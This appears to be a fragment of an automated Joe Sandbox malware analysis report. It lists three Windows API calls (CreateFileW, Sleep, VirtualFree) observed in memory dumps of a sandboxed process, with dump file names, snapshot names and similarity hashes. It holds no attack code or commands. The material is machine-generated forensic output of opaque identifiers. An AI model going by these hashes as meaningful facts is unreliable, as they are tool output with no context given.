                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,00000000,?,01030704,?,?,00000000), ref: 010303B7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true
                                                • Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_ff0000_name.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: e4d0f236792991fbc11c3b96bd51036dc688c41300c131f98e578e9e0a8dee9f
                                                • Instruction ID: d7b574ce2998457d26a63b2c3fdfd7b8804e774b3a7ce88166dc261cac95c6c7
                                                • Opcode Fuzzy Hash: e4d0f236792991fbc11c3b96bd51036dc688c41300c131f98e578e9e0a8dee9f
                                                • Instruction Fuzzy Hash: 4FD06C3204010DBBDF128E84DD46EDA3BAAFB48714F014000BE5856020C736E821AB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 00192311
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 928fddb83e9d1a7ff5808641c03a6ef6c9104c1f224111c55cf3e0cc934d5bb3
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: 4BE0BF7494010DAFDB00EFB4D5496AE7BB4EF04301F100561FD0192280D7309A508A62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001929C7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_190000_name.jbxd
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: f270ebcaac59cc56f274bf2b9a4993adbf3a33633fac7b4906b7d75e97b86e1d
                                                • Instruction ID: 8c140f89233f66b102fa268125dc0f928b204d1aecf41470ebe721c69a2c5f92
                                                • Opcode Fuzzy Hash: f270ebcaac59cc56f274bf2b9a4993adbf3a33633fac7b4906b7d75e97b86e1d
                                                • Instruction Fuzzy Hash: 93C04C7AF40108A7DB10DAE9ED4AFDDB3B8EB58711F204266FA00E7280D6B169158B94
                                                Uniqueness

                                                Uniqueness Score: -1.00%